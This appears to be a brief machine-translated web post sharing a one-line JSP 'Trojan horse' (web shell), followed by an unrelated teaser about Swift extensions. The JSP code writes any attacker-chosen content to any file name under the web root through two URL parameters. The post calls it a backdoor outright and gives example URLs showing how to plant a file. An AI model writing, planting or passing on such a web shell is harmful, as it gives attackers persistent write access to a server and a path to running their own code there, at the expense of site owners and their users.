JSP one sentence Trojan horse code

Time:2021-10-16
Copy codeThe code is as follows:
<% 
if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“\”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes()); 
%> 

this   I guess I don’t have to say the back door. I’d better prompt it. Save it as 1.jsp   Submit url!
http://localhost/1.jsp?f=1.txt&t=hello
then: http://localhost/1.txt   Just came out   The content is   hello  ….. 

Recommended Today

Swift advanced (XV) extension

The extension in swift is somewhat similar to the category in OC Extension can beenumeration、structural morphology、class、agreementAdd new features□ you can add methods, calculation attributes, subscripts, (convenient) initializers, nested types, protocols, etc What extensions can’t do:□ original functions cannot be overwritten□ you cannot add storage attributes or add attribute observers to existing attributes□ cannot add parent […]